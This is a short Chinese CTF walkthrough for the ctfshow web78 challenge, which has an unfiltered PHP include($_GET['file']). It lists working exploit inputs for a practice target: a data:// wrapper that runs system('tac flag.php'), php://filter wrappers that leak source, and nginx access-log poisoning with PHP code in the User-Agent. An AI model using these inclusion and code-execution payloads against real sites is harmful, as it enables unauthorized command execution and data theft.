当前位置: 首页 > news >正文

[ctfshow web入门] web78

news 来源:原创 2025/5/31 16:11:04

信息收集

表面上没有任何过滤,自由发挥

if(isset($_GET['file'])){$file = $_GET['file'];include($file);
}else{highlight_file(__FILE__);
}

解题

这些解法都在web32解释过,不再详细解释,有需要点击超链接:[ctfshow web入门] web32

伪协议

?file=data://text/plain,<?php system("tac flag.php") ?>
?file=php://filter/read=convert.base64-encode/resource=flag.php
?file=php://filter/read=convert.iconv.ascii.utf-16/resource=flag.php

日志包含

?file=/var/log/nginx/access.log

user-agent里写上

<?php system('ls'); ?>
<?php system('tac flag.php'); ?>

在这里插入图片描述

web124    目录    web79

相关文章:

  • MySQL8.4组复制
  • Linux服务器时间同步——Chronyd
  • 核心知识点:惯性导航(Inertial Navigation)
  • JDBC连接数据库精准提炼
  • 具身智能(Embodied AI)
  • 把 jar 打包成 exe
  • CTA-861-G-2017中文pdf版
  • 【QQ音乐】sign签名| data参数加密 | AES-GCM加密 | webpack (下)
  • CppCon 2014 学习第3天:Viewing the world through array-shaped glasses
  • 传输层协议TCP(上)
  • 知识隔离的视觉-语言-动作模型:训练更快、运行更快、泛化更好
  • 【仿生系统】qwen的仿生机器人解决方案
  • 工程化架构设计:Monorepo 实战与现代化前端工程体系构建
  • Webug4.0靶场通关笔记03- 第3关SQL注入之时间盲注(手注法+脚本法 两种方法)
  • 【AI论文】ScienceBoard:评估现实科学工作流程中的多模态自主代理
  • Unity Button 交互动画
  • 易经六十四卦象解释数据集分享!智能体知识库收集~
  • 使用MFC 写dap上位机在线烧写FLASH
  • UE路径追踪Path Tracing和Lumen的区别
  • 从 0 到 1 的显示革命:九天画芯张锦解码铁电液晶技术进化史
  • 南京网站建设招聘/优化公司排名
  • web网站设计的要求/推广关键词外包
  • 大连网站开发多少钱/百度云官方网站
  • 建站之星至尊版/2022最新热点事件及点评
  • 宝山网站建设公司/百度竞价被点击软件盯上
  • 网站建设工作情况总结/线上网络平台推广